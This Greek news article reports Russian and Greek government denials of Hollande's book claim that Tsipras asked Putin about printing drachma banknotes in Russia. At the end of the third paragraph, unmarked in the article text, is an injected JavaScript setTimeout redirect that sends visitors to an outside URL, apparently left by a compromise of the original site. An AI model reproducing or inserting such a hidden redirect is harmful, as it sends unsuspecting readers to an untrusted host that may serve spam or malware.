Ο Πούτιν διαψεύδει τον Ολάντ!

0
13

 

Μετά τον σάλο που ξέσπασε από την αποκάλυψη του Ολάντ στο βιβλίο του «Ενας πρόεδρος δεν πρέπει να τα λέει όλα» όπου αναφέρει ότι ο Ρώσος πρόεδρος Βλαντίμιρ Πούτιν του τηλεφώνησε ενημερώνοντάς τον ότι ο Τσίπρας κατά την επίσκεψη του στη Μόσχα, τον ρώτησε αν θα μπορούσε να τυπώσει χαρτονομίσματα δραχμής στη Ρωσία, τώρα η Μόσχα δαψεύδει.

Σε ανταπόκρισή του από τη ρωσική πρωτεύουσα για τον realfm 97,8, ο Αχιλλέας Πατσούκας μετέδωσε ότι πηγές πολύ κοντά στον πρόεδρο Πούτιν διαψεύδουν το περιεχόμενο του διαλόγου που αφορά στο τύπωμα χαρτονομισμάτων στη Ρωσία και τόνιζαν ότι ουδέποτε τέθηκε από την ελληνική πλευρά αίτημα για δανειοδότηση.

Στο μεταξύ την αποκάλυψη διέψευσε χθες και κυβερνητική πηγή που μιλώντας στο Αθηναϊκό Πρκατορείο είπε: «Επικοινωνίες μεταξύ των δύο ηγετών υπήρξαν, ωστόσο σε καμία περίπτωση δεν τέθηκε τέτοιο θέμα από τον Έλληνα πρωθυπουργό. Αντιθέτως, κοινός τόπος ήταν ότι ο μόνος ρεαλιστικός δρόμος είναι η παραμονή της Ελλάδας στην Ευρωζώνη». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here